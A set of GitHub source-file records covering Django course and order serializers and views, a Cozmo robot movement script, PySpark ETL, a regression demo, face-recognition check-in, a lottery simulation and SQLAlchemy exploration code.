many=False).data\r\n\r\n def get_instructor(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n return UserTeacherCountModelSerializer(obj.user, read_only=True).data\r\n\r\n def get_benefits(self, obj):\r\n benefits = CourseBenefit.objects.filter(course=obj.id)\r\n return CourseBenefitModelSerializer(benefits, many=True).data\r\n\r\n\r\n def get_benefits(self, obj):\r\n benefits = CourseBenefit.objects.filter(course=obj.id)\r\n return CourseBenefitModelSerializer(benefits, many=True).data\r\n\r\n def get_blocks(self, obj):\r\n return obj.blocks.count()\r\n\r\n def get_items(self, obj):\r\n items = CourseItemTrack.objects.filter(course=obj.id).count()\r\n return items\r\n\r\n def get_total_duration(self, obj):\r\n return LectureContent.objects.filter(course=obj.id, type_choices=\"VI\").aggregate(Sum('duration'))['duration__sum']\r\n\r\nclass CourseCreateSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = Course\r\n fields = (\r\n 'id',\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n def create(self, validated_data):\r\n\r\n user = self.context['request'].user\r\n validated_data['user'] = user\r\n validated_data['teacher'] = user.teacher\r\n\r\n program = self.context['program']\r\n validated_data['program'] = program\r\n\r\n return super().create(validated_data)\r\n\r\n\r\nclass CourseModifyModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n course_price = serializers.SerializerMethodField(read_only=True)\r\n course_language = serializers.SerializerMethodField(read_only=True)\r\n students = serializers.SerializerMethodField(read_only=True)\r\n instructor = serializers.SerializerMethodField(read_only=True)\r\n benefits = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = Course\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'title',\r\n 'subtitle',\r\n 'description',\r\n 'course_price',\r\n 'course_language',\r\n 'offer_persentage',\r\n 'picture',\r\n 'students',\r\n 'instructor',\r\n 'benefits',\r\n 'published',\r\n 'published_in_program',\r\n 'video_presentation',\r\n\r\n 'color',\r\n\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n\r\n def get_students(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n students = obj.students.all().count()\r\n return students\r\n\r\n def get_course_price(self, obj):\r\n price = CoursePrice.objects.filter(course=obj)\r\n if price.count() > 0:\r\n return CoursePriceModelSerializer(price[0], many=False).data\r\n\r\n def get_course_language(self, obj):\r\n language = CourseLanguage.objects.filter(course=obj)\r\n if language.count() > 0:\r\n return CourseLanguageModelSerializer(language[0], many=False).data\r\n\r\n def get_instructor(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n return UserTeacherCountModelSerializer(obj.user, read_only=True).data\r\n\r\n\r\n def get_benefits(self, obj):\r\n benefits = CourseBenefit.objects.filter(course=obj.id)\r\n return CourseBenefitModelSerializer(benefits, many=True).data\r\n\r\n def update(self, instance, validated_data):\r\n # Actualizar el precio de la clase\r\n if 'price' in self.context and self.context['price'] != None:\r\n CoursePrice.objects.filter(course=instance).delete()\r\n CoursePrice.objects.create(\r\n **self.context['price'], course=instance)\r\n\r\n if 'language' in 
self.context and self.context['language'] != None:\r\n CourseLanguage.objects.filter(course=instance).delete()\r\n CourseLanguage.objects.create(\r\n **self.context['language'], course=instance)\r\n if 'benefits' in self.context and self.context['benefits'] != None:\r\n CourseBenefit.objects.filter(course=instance.pk).delete()\r\n for benefit in self.context['benefits']:\r\n CourseBenefit.objects.create(**benefit, course=instance)\r\n \r\n # Actualizar el tracks\r\n if 'tracks' in self.context and self.context['tracks'] != None:\r\n tracks = self.context['tracks']\r\n for track in tracks:\r\n track_object = get_object_or_404(CourseBlockTrack, id=track['id'])\r\n track_object.position = track['position']\r\n track_object.save()\r\n \r\n return super(CourseModifyModelSerializer, self).update(instance, validated_data)\r\n\r\n\r\nclass PublishCourseSerializer(serializers.Serializer):\r\n\r\n def validate(self, data):\r\n course = self.instance\r\n if not self.context['publish_in_program']:\r\n if not CoursePrice.objects.filter(course=course).exists():\r\n raise serializers.ValidationError(\r\n 'El curso no tiene un precio especificado')\r\n\r\n if not course.picture:\r\n raise serializers.ValidationError(\r\n 'El curso no tiene una imágen')\r\n # import pdb; pdb.set_trace()\r\n if not self.context['publish_in_program']:\r\n if not course.user.profile.stripe_account_id:\r\n raise serializers.ValidationError(\r\n 'Necesitas conectarte con stripe para poder recibir pagos')\r\n\r\n if len(course.title) == 0:\r\n raise serializers.ValidationError('Se requiere un titulo')\r\n\r\n return data\r\n\r\n def update(self, instance, validated_data):\r\n if self.context['publish_in_program']:\r\n instance.published_in_program = True\r\n\r\n else:\r\n instance.published = True\r\n instance.save()\r\n return instance\r\n\r\n\r\nclass CancelPublishCourseSerializer(serializers.Serializer):\r\n\r\n def update(self, instance, validated_data):\r\n if self.context['publish_in_program']:\r\n instance.published_in_program = False\r\n\r\n else:\r\n instance.published = False\r\n instance.save()\r\n return instance\r\n\r\n\r\nclass AddStudentCourseSerializer(serializers.Serializer):\r\n student = serializers.SerializerMethodField()\r\n\r\n def get_student(self, obj):\r\n from api.users.serializers.users import UserModelSerializer\r\n return UserModelSerializer(self.context['request'].user).data\r\n\r\n def validate(self, data):\r\n user = self.context['request'].user\r\n\r\n data = {\r\n 'user': user\r\n }\r\n return data\r\n\r\n def update(self, instance, validated_data):\r\n\r\n instance.students.add(validated_data['user'])\r\n\r\n instance.save()\r\n return instance\r\n\r\n \r\n\r\n\r\nclass CoursePlayingModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n course_language = serializers.SerializerMethodField(read_only=True)\r\n students_count = serializers.SerializerMethodField(read_only=True)\r\n instructor = serializers.SerializerMethodField(read_only=True)\r\n blocks = serializers.SerializerMethodField(read_only=True)\r\n blocks_count = serializers.SerializerMethodField(read_only=True)\r\n items_count = serializers.SerializerMethodField(read_only=True)\r\n total_duration = serializers.SerializerMethodField(read_only=True)\r\n current_item_watching = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = Course\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'title',\r\n 'subtitle',\r\n 'description',\r\n 
'course_language',\r\n 'picture',\r\n 'students_count',\r\n 'students',\r\n 'instructor',\r\n 'published_in_program',\r\n 'video_presentation',\r\n 'published',\r\n 'offer_persentage',\r\n 'blocks',\r\n 'blocks_count',\r\n 'items_count',\r\n 'total_duration',\r\n 'color',\r\n 'current_item_watching'\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n\r\n def get_students_count(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n students = obj.students.all().count()\r\n return students\r\n\r\n\r\n def get_course_language(self, obj):\r\n language = CourseLanguage.objects.filter(course=obj)\r\n if language.count() > 0:\r\n return CourseLanguageModelSerializer(language[0], many=False).data\r\n\r\n def get_instructor(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n return UserTeacherCountModelSerializer(obj.user, read_only=True).data\r\n\r\n def get_blocks(self, obj):\r\n from api.programs.serializers import CourseBlockTrackPlayingModelSerializer\r\n\r\n blocks = CourseBlockTrack.objects.filter(course=obj.id)\r\n request = self.context.get('request', None)\r\n \r\n if request and request.user and request.user.id:\r\n\r\n return CourseBlockTrackPlayingModelSerializer(blocks,user=request.user, many=True).data\r\n else:\r\n return CourseBlockTrackPlayingModelSerializer(blocks,user=None, many=True).data\r\n\r\n def get_items_count(self, obj):\r\n items = CourseItemTrack.objects.filter(course=obj.id).count()\r\n return items\r\n\r\n def get_blocks_count(self, obj):\r\n return obj.blocks.count()\r\n\r\n def get_total_duration(self, obj):\r\n return LectureContent.objects.filter(course=obj.id, type_choices=\"VI\").aggregate(Sum('duration'))['duration__sum']\r\n\r\n def get_current_item_watching(self, obj):\r\n from api.programs.serializers import CourseUserDataModelSerializer\r\n \r\n request = self.context.get('request', None)\r\n \r\n if request and request.user and request.user.id:\r\n\r\n course_user_data = CourseUserData.objects.filter(course=obj.id, user=self.context['request'].user)\r\n if len(course_user_data) > 0:\r\n return CourseUserDataModelSerializer(course_user_data[0], many=False).data['current_item_watching']\r\n else: \r\n return None\r\n else: \r\n return None\r\n\r\nclass CourseContentModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n course_language = serializers.SerializerMethodField(read_only=True)\r\n course_price = serializers.SerializerMethodField(read_only=True)\r\n students_count = serializers.SerializerMethodField(read_only=True)\r\n instructor = serializers.SerializerMethodField(read_only=True)\r\n blocks = serializers.SerializerMethodField(read_only=True)\r\n blocks_count = serializers.SerializerMethodField(read_only=True)\r\n items_count = serializers.SerializerMethodField(read_only=True)\r\n materials_count = serializers.SerializerMethodField(read_only=True)\r\n total_duration = serializers.SerializerMethodField(read_only=True)\r\n benefits = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = Course\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'title',\r\n 'subtitle',\r\n 'description',\r\n 'course_language',\r\n 'course_price',\r\n 'picture',\r\n 'students_count',\r\n 'students',\r\n 'instructor',\r\n 'offer_persentage',\r\n 'published_in_program',\r\n 'video_presentation',\r\n 'published',\r\n 'blocks',\r\n 'blocks_count',\r\n 'items_count',\r\n 'total_duration',\r\n 'color',\r\n 
'materials_count',\r\n 'benefits',\r\n 'modified'\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n\r\n def get_students_count(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n students = obj.students.all().count()\r\n return students\r\n\r\n\r\n def get_course_language(self, obj):\r\n language = CourseLanguage.objects.filter(course=obj)\r\n if language.count() > 0:\r\n return CourseLanguageModelSerializer(language[0], many=False).data\r\n\r\n\r\n def get_course_price(self, obj):\r\n price = CoursePrice.objects.filter(course=obj)\r\n if price.count() > 0:\r\n return CoursePriceModelSerializer(price[0], many=False).data\r\n\r\n def get_instructor(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n return UserTeacherCountModelSerializer(obj.user, read_only=True).data\r\n\r\n def get_blocks(self, obj):\r\n from api.programs.serializers import CourseBlockTrackContentModelSerializer\r\n\r\n blocks = CourseBlockTrack.objects.filter(course=obj.id)\r\n return CourseBlockTrackContentModelSerializer(blocks, many=True).data\r\n\r\n def get_items_count(self, obj):\r\n items = CourseItemTrack.objects.filter(course=obj.id).count()\r\n return items\r\n\r\n def get_blocks_count(self, obj):\r\n return obj.blocks.count()\r\n\r\n def get_materials_count(self, obj):\r\n items = LectureMaterial.objects.filter(course=obj.id).count()\r\n return items\r\n\r\n\r\n def get_total_duration(self, obj):\r\n return LectureContent.objects.filter(course=obj.id, type_choices=\"VI\").aggregate(Sum('duration'))['duration__sum']\r\n\r\n def get_benefits(self, obj):\r\n benefits = CourseBenefit.objects.filter(course=obj.id)\r\n return CourseBenefitModelSerializer(benefits, many=True).data","repo_name":"alexhernandez-git/django-classline","sub_path":"api/programs/serializers/courses/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":16633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37078829512","text":"import cozmo\nfrom cozmo.util import degrees, distance_mm\n\n# Define a constant for unit distance in millimeters\nUNIT_DISTANCE_MM = 100\n\n# Using a combination of vertical and horizontal movements.\n##########################################################>\n##########################################################> move_to_target_position()\ndef move_to_target_position(robot, start, end):\n distance_x = end[0] - start[0]\n distance_y = end[1] - start[1]\n robot.say_text(\"Now I will move vertically and horizontally\").wait_for_completed()\n while distance_x != 0 or distance_y != 0:\n if distance_y != 0:\n ##########################> Move vertically\n direction = 1 if distance_y > 0 else -1\n robot.drive_straight(distance_mm((UNIT_DISTANCE_MM * direction)), cozmo.util.speed_mmps(100)).wait_for_completed()\n distance_y = distance_y - direction\n\n if distance_x != 0:\n ##########################> Turn and move horizontally\n direction = -1 if distance_x > 0 else 1\n robot.turn_in_place((degrees(90 * direction))).wait_for_completed()\n robot.drive_straight(distance_mm(UNIT_DISTANCE_MM), cozmo.util.speed_mmps(100)).wait_for_completed()\n robot.turn_in_place(degrees(-90 * direction)).wait_for_completed()\n distance_x = distance_x + direction\n ###################################> play_anim\n robot.say_text(\"Now I am at x and y\").wait_for_completed()\n 
robot.play_anim(name=\"anim_petdetection_dog_03\").wait_for_completed()\n\n\n##########################################################>\n##########################################################> cozmo_program()\ndef cozmo_program(robot: cozmo.robot.Robot):\n start_position = (0, 0) # Starting position (0, 0)\n target_position = (2, 4) # Set your target position (x, y)\n move_to_target_position(robot, start_position, target_position)\n\n # If you want to start from a different position, uncomment and use the following code:\n start_position = (2, 4) # Set your starting position (a, b)\n target_position = (0, 0) # Set your target position (x, y)\n move_to_target_position(robot, start_position, target_position)\n\n##########################################################>\n##########################################################> run_program ()\nif __name__ == '__main__':\n cozmo.run_program(cozmo_program, use_viewer=False, force_viewer_on_top=False)\n\n","repo_name":"CozmoRobots/Variation3","sub_path":"Movement_Assignment.py","file_name":"Movement_Assignment.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38150159673","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import lit\nfrom pyspark.sql.functions import col\n\nclass ETLSuperStore:\n # Create the Spark Session and Path Folder\n def __init__(self):\n self.spark_session = (SparkSession.builder.master(\"local[*]\").appName(\"SuperStoreETL\").getOrCreate())\n self.path_folder = \"/home/pydev/workflow/dt_learn_data_science/spark/superstore\"\n\n def extractSales(self):\n self.salesDf = self.spark_session.read.option(\"header\", \"true\") \\\n .option(\"inferSchema\", \"true\")\\\n .option(\"sep\", \",\")\\\n .csv(f\"{self.path_folder}/data/Super_Store_Sales_*.csv\")\n\n # print(self.salesDf.count())\n # print(self.salesDf.show())\n # print(\"Hello\") \n\n# Main\netl = ETLSuperStore()\netl.extractSales()\n","repo_name":"edwinmesa/dt_learn_data_science","sub_path":"spark/superstore/superStoreClass.py","file_name":"superStoreClass.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24944164192","text":"# # In [1]:\r\n# import numpy as np\r\n# import matplotlib.pyplot as plt\r\n# X=np.array([[6],[8],[10],[14],[18]]).reshape(-1,1)\r\n# y=[7,9,13,17.5,18]\r\n# plt.figure()\r\n# plt.title('Pizza price plotted against diamater')\r\n# plt.xlabel('Diamter in inches')\r\n# plt.ylabel('Price in dollars')\r\n# plt.plot(X,y,'k.')\r\n# plt.axis([0,25,0,25])\r\n# plt.grid(True)\r\n# plt.show()\r\n#\r\n# # In [2]:\r\n# from sklearn.linear_model import LinearRegression\r\n# model = LinearRegression()\r\n# model.fit(X,y)\r\n# test_pizza=np.array([[8]])\r\n# predicted_price=model.predict(test_pizza)[0]\r\n# print('A 12\" pizza should cost: $%.2f' % predicted_price)\r\n# print('Residual sum of squares: %.2f' % np.mean((model.predict(X)-y)**2))\r\n# #\r\n#\r\n# # # In [2]:\r\n# import numpy as np\r\n# X=np.array([[6],[8],[10],[14],[18]]).reshape(-1,1)\r\n# x_bar=X.mean()\r\n# print(x_bar)\r\n# variance=((X-x_bar)**2).sum()/(X.shape[0]-1)\r\n# print(variance)\r\n# print(np.var(X,ddof=1))\r\n# #\r\n# # # In [4]:\r\n# y=np.array([7,9,13,17.5,18])\r\n# y_bar=y.mean()\r\n# covariance=np.multiply((X-x_bar).transpose(),y-y_bar).sum() / (X.shape[0]-1)\r\n# print(covariance)\r\n# print(np.cov(X.transpose(),y)[0][1])\r\n\r\n# In 
[1]:\r\nimport numpy as np\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\nX_train=np.array([6,8,10,14,18]).reshape(-1,1)\r\ny_train=[7,9,13,17.5,18]\r\n\r\nX_test=np.array([8,9,11,16,12]).reshape(-1,1)\r\ny_test=[11,8.5,15,18,11]\r\n\r\nmodel=LinearRegression()\r\nmodel.fit(X_train,y_train)\r\nr_squared=model.score(X_test,y_test)\r\nprint(r_squared)","repo_name":"yzjbryant/YZJ_MIX_Code","sub_path":"Python_Code_Beginner/机器学习新/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70962810729","text":"from face_recognize import FaceRecognize\r\nfrom checkin_qrcode_reader import CheckInQRCodeReader\r\n\r\ndef qrCodeReader():\r\n print('Start QR Code Reader')\r\n checkInQRCodeReader = CheckInQRCodeReader()\r\n qrCodeData = checkInQRCodeReader.start()\r\n del checkInQRCodeReader\r\n print('Patient Detail : ', qrCodeData)\r\n\r\ndef faceRecognize():\r\n print('Start Face Recognition')\r\n faceRecognize = FaceRecognize()\r\n faceRecognize.initialize()\r\n faceRecognizedName = faceRecognize.start()\r\n del faceRecognize\r\n if len(faceRecognizedName) > 0 and faceRecognizedName[0] != 'Unknown':\r\n print('Patient Detail : ', faceRecognizedName[0])\r\n else:\r\n print('Face Recognition Failed')\r\n qrCodeReader()\r\n\r\ndef main():\r\n faceRecognize()\r\n\r\nmain()","repo_name":"Bala14/FaceRecognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18773027120","text":"# coding=utf-8\n# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom decimal import Decimal\n\nfrom django.db import transaction\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom shopping_user.models import UserInfo\nfrom shopping_user.user_decorator import login\nfrom user_cart.models import CartInfo\nfrom shopping_goods.models import GoodsInfo\nfrom .models import OrderInfo,OrderDetailInfo\n\n@login\ndef order(request):\n uid = request.session['user_id']\n user= UserInfo.objects.get(pk=int(uid))\n orderid = request.GET.getlist('orderid')\n orderlist = []\n for id in orderid:\n orderlist.append(CartInfo.objects.get(id=int(id)))\n\n # 判断用户手机号是否为空,分别做展示\n if user.userphone == '':\n userphone = ''\n else:\n userphone = user.userphone[0:4] + \\\n '****' + user.userphone[-4:]\n context = {\n 'title':'提交订单',\n 'user_order':1,\n 'page_name':1,\n 'user':user,\n 'orderlist':orderlist,\n 'userphone':userphone\n }\n return render(request,'user_order/place_order.html',context)\n\n@transaction.atomic()\n@login\ndef order_handle(request):\n #保存一个事物点\n tran_id = transaction.savepoint()\n #接收购物车编号\n # 根据POST和session获取信息\n # cart_ids=post.get('cart_ids')\n try:\n post = request.POST\n orderlist = post.getlist('id[]')\n total = post.get('total')\n address = post.get('address')\n\n order=OrderInfo()\n now=datetime.now()\n uid = request.session.get('user_id')\n order.oid='%s%d'%(now.strftime('%Y%m%d%H%M%S'),uid)\n order.user_id=uid\n order.odate=now\n order.ototal=Decimal(total)\n order.oadd = address\n order.save()\n\n # 遍历购物车中提交信息,创建订单详情表\n for orderid in orderlist:\n cartinfo = CartInfo.objects.get(id=orderid)\n good = GoodsInfo.objects.get(cartinfo__id=cartinfo.id)\n\n # 判断库存是否够\n if int(good.gstock) >= int(cartinfo.count):\n # 库存够,移除购买数量并保存\n good.gstock -= int(cartinfo.count)\n good.save()\n\n goodinfo = 
GoodsInfo.objects.get(cartinfo__id=orderid)\n\n # 创建订单详情表\n detailinfo = OrderDetailInfo()\n detailinfo.goods_id = int(goodinfo.id)\n detailinfo.order_id = int(order.oid)\n detailinfo.price = Decimal(int(goodinfo.gprice))\n detailinfo.count = int(cartinfo.count)\n detailinfo.save()\n\n # 循环删除购物车对象\n cartinfo.delete()\n else:\n # 库存不够出发事务回滚\n transaction.savepoint_rollback(tran_id)\n # 返回json供前台提示失败\n return JsonResponse({'status': 2})\n except Exception as e:\n print('==================%s'%e)\n transaction.savepoint_rollback(tran_id)\n # 返回json供前台提示成功\n return JsonResponse({'status': 1})\n\n@transaction.atomic()\ndef pay(request,oid):\n order=OrderInfo.objects.get(oid=oid)\n order.oIspay=True\n order.save()\n context={'order':order}\n return render(request,'df_order/pay.html',context)","repo_name":"bibiwannabe/Django-ShoppingWebsite","sub_path":"shopping/user_order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21683763102","text":"import random\nimport requests\nimport json\nfrom pprint import pprint\n# 정원이 코드\nurl = 'https://dhlottery.co.kr/common.do?method=getLottoNumber&drwNo=860'\nres = requests.get(url)\nlottery = res.json()\n\nwinner = set([])\nfor i in range(1, 7) :\n winner.add(lottery[f'drwtNo{i}'])\n\nbonus = set([lottery['bnusNo']])\n\ncount = 0\nfirst = 0\nsecond = 0\nthird = 0\nforth = 0\nfifth = 0\n\nwhile True :\n numbers = set(random.sample(range(1, 46), 6))\n\n jackpot = winner & numbers\n lucky = bonus & numbers\n\n if len(jackpot) == 6 :\n first += 1\n first_num = numbers\n break\n elif len(jackpot) == 5 and len(lucky) == 1 :\n second += 1\n elif len(jackpot) == 5 :\n third += 1\n elif len(jackpot) == 4 :\n forth += 1\n elif len(jackpot) == 3 :\n fifth += 1\n\n count += 1\n\nreward_all = count * 1000\nreward_5 = 5000 * fifth\nreward_4 = 50000 * forth\nreward_3 = int(( reward_all - ( reward_4 + reward_5 )) * 0.125 / third)\nreward_2 = int(( reward_all - ( reward_4 + reward_5 )) * 0.125 / second)\nreward_1 = int(( reward_all - ( reward_4 + reward_5 )) * 0.75 / first)\n\nprint('로또 제 860회')\nprint(f'총 구매자 수 : {count}')\nprint(f'총 당첨금 : {reward_all}')\nprint(f'당첨번호 {winner} + {bonus}')\nprint('------------------------------------')\nprint(f'1등 당첨자 수 : {first}')\nprint(f'1등 당첨금 : {reward_1}')\nprint('------------------------------------')\nprint(f'2등 당첨자 수 : {second}')\nprint(f'2등 당첨금 : {reward_2}')\nprint('------------------------------------')\nprint(f'3등 당첨자 수 : {third}')\nprint(f'3등 당첨금 : {reward_3}')\nprint('------------------------------------')\nprint(f'4등 당첨자 수 : {forth}')\nprint(f'4등 당첨금 : {50000}')\nprint('------------------------------------')\nprint(f'5등 당첨자 수 : {fifth}')\nprint(f'5등 당첨금 : {5000}')\nprint('------------------------------------')\nprint(f'기부자 수 : {count - first - second - third - forth - fifth}')","repo_name":"gtj1323/DjangoStudy","sub_path":"dict_project/lotto_2_other3.py","file_name":"lotto_2_other3.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30692411700","text":"import sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\n\n\n## Create engine using the `belly_button_biodiversity.sqlite` database file\n#engine = 
create_engine(\"sqlite:///belly_button_biodiversity.sqlite\")\n## Declare a Base using `automap_base()`\n#Base = automap_base()\n## Use the Base class to reflect the database tables\n#Base.prepare(engine, reflect=True)\n## Assign the samples class to a variable called `Samples`\n#Samples = Base.classes\n## Create a session\n#session = Session(engine)\n## Create connection\n#conn = engine.connect()\n\n\n# def get_sample_names():\n# '''List of sample names'''\n# sample_names = []\n# first_row = session.query(Samples).first()\n# abc = first_row.__dict__\n# for key in abc:\n# sample_names.append(key)\n# sample_names.sort()\n# sample_names = sample_names[0:-2]\n# # return render_template('index.html', samplenames = sample_names) \n# print(sample_names)\n\n# get_sample_names()\n\n#def get_otu_descriptions():\n# '''List of OTU descriptions'''\n# otu_list = []\n# # first_row = session.query(Samples.otu).first()\n# # abc = first_row.__dict__\n# for row in session.query(Samples.otu.lowest_taxonomic_unit_found).all():\n# otu_list.append(row[0])\n# print(otu_list)\n\n#get_otu_descriptions()\n\n#def get_default_values():\n# '''OTU IDs and Sample Values for a given sample.'''\n# data_samples = pd.read_sql(\"SELECT * FROM samples\", conn)\n# default_dict={}\n# default_data = []\n# for c in data_samples.columns[1:]:\n# sample_values = []\n# otu_id = []\n#\n# for x in range(len(data_samples[c])):\n# if data_samples[c][x] != 0: \n# sample_values.append(data_samples[c][x])\n# otu_id.append(data_samples['otu_id'][x])\n# temp_df = pd.DataFrame({'sample_values': sample_values, 'otu_id': otu_id}, \n# columns=['sample_values', 'otu_id'])\n# temp_df = temp_df.sort_values('sample_values', ascending=False).reset_index(drop=True)\n# s_list = list(temp_df.sample_values)\n# o_list = list(temp_df.otu_id)\n# \n# default_dict['otu_ids'] = o_list[0:11]\n# default_dict['sample_values'] = s_list[0:11]\n# \n# default_data = [{\n# \"labels\": o_list[0:11],\n# \"values\": s_list[0:11],\n# \"type\": \"pie\"}]\n# print (default_data)\n# \n#get_default_values()\n\n#def get_default_values2():\n# '''OTU IDs and Sample Values for a given sample.'''\n# data_samples = pd.read_sql(\"SELECT * FROM samples\", conn)\n# final_list=[]\n# count = 1\n# for c in data_samples.columns[1:]:\n# # print(c)\n# all_sample_info = {}\n# sample_values = []\n# otu_id = []\n# # print(len(data_samples[c]))\n# for x in range(len(data_samples[c])):\n# # print(len(data_samples[c]))\n# # print(data_samples[c][x])\n# # print(data_samples['otu_id'][x])\n# if data_samples[c][x] != 0: \n# sample_values.append(data_samples[c][x])\n# otu_id.append(data_samples['otu_id'][x])\n# temp_df = pd.DataFrame({'sample_values': sample_values, 'otu_id': otu_id}, \n# columns=['sample_values', 'otu_id'])\n# temp_df = temp_df.sort_values('sample_values', ascending=False).reset_index(drop=True)\n# s_values = []\n# o_values = []\n# for x in range(len(temp_df['sample_values'])):\n# s_values.append(temp_df.sample_values[x])\n# o_values.append(temp_df.otu_id[x])\n#\n# all_sample_info['otu_ids'] = o_values[0:11]\n# all_sample_info['sample_values'] = s_values[0:11]\n# all_sample_info_dict = {}\n# all_sample_info_dict[data_samples.columns[count]]=all_sample_info\n# final_list.append(all_sample_info_dict)\n# count += 1\n# print(final_list)\n# \n#get_default_values2()\n\n\n\n#def get_default_values3():\n# data_samples = pd.read_sql(\"SELECT * FROM samples\", conn)\n#\n# final_list=[]\n# count = 1\n# for c in data_samples.columns[1:]:\n# # print(c)\n# all_sample_info = {}\n# sample_values = 
[]\n# otu_id = []\n# # print(len(data_samples[c]))\n# for x in range(len(data_samples[c])):\n# # print(len(data_samples[c]))\n# # print(data_samples[c][x])\n# # print(data_samples['otu_id'][x])\n# if data_samples[c][x] != 0: \n# sample_values.append(data_samples[c][x])\n# otu_id.append(data_samples['otu_id'][x])\n# temp_df = pd.DataFrame({'sample_values': sample_values, 'otu_id': otu_id}, \n# columns=['sample_values', 'otu_id'])\n# temp_df = temp_df.sort_values('sample_values', ascending=False).reset_index(drop=True)\n# temp_df['sample_values'] = temp_df['sample_values'].astype(float)\n# temp_df['otu_id'] = temp_df['otu_id'].astype(str)\n# s_values = []\n# o_values = []\n# for x in range(len(temp_df['sample_values'])):\n# s_values.append(temp_df.sample_values[x])\n# o_values.append(temp_df.otu_id[x])\n#\n# all_sample_info['otu_ids'] = o_values[0:11]\n# all_sample_info['sample_values'] = s_values[0:11]\n# all_sample_info_dict = {}\n# all_sample_info_dict[data_samples.columns[count]]=all_sample_info\n# final_list.append(all_sample_info_dict)\n# count += 1\n# print(final_list)\n#get_default_values3()\n\n\n#\n#\n#def get_metadata(sample1):\n# '''Get Metadata of given sample id'''\n# # Create engine using the `belly_button_biodiversity.sqlite` database file\n# engine = create_engine(\"sqlite:///belly_button_biodiversity.sqlite\")\n# # Declare a Base using `automap_base()`\n# Base = automap_base()\n# # Use the Base class to reflect the database tables\n# Base.prepare(engine, reflect=True)\n# # Assign the samples class to a variable called `Samples`\n## Samples2 = Base.classes\n# # Create a session\n## session = Session(engine)\n# conn = engine.connect()\n# \n# metadata_info = {}\n#\n# data = pd.read_sql(\"SELECT * FROM samples_metadata\", conn)\n# data['SAMPLEID2'] = ''\n# for x in range(len(data.SAMPLEID)):\n# data.SAMPLEID2[x] = \"BB_\" + str(data.SAMPLEID[x]) \n#\n# sample_metadata = data[['SAMPLEID2', 'AGE', 'BBTYPE', 'ETHNICITY', 'GENDER', 'LOCATION', 'SAMPLEID']]\n# sample_metadata.set_index(\"SAMPLEID2\", inplace=True)\n# sample_metadata = sample_metadata.transpose()\n# sample_metadata.to_json('resources/sample_metadata.json')\n# sample_metadata_json = pd.read_json('resources/sample_metadata.json')\n# \n# metadata_info['AGE'] = sample_metadata_json[sample1]['AGE']\n# metadata_info['BBTYPE'] = sample_metadata_json[sample1]['BBTYPE']\n# metadata_info['ETHNICITY'] = sample_metadata_json[sample1]['ETHNICITY']\n# metadata_info['GENDER'] = sample_metadata_json[sample1]['GENDER']\n# metadata_info['LOCATION'] = sample_metadata_json[sample1]['LOCATION']\n# metadata_info['SAMPLEID'] = sample_metadata_json[sample1]['SAMPLEID']\n# print(metadata_info)\n# \n#get_metadata('BB_940')\n\n\n\n\ndef get_metadata():\n '''Get Metadata of given sample id'''\n # Create engine using the `belly_button_biodiversity.sqlite` database file\n engine = create_engine(\"sqlite:///belly_button_biodiversity.sqlite\")\n # Declare a Base using `automap_base()`\n Base = automap_base()\n # Use the Base class to reflect the database tables\n Base.prepare(engine, reflect=True)\n # Assign the samples class to a variable called `Samples`\n# Samples2 = Base.classes\n # Create a session\n# session = Session(engine)\n conn = engine.connect()\n\n data = pd.read_sql(\"SELECT * FROM samples_metadata\", conn)\n# data['SAMPLEID2'] = ''\n# for x in 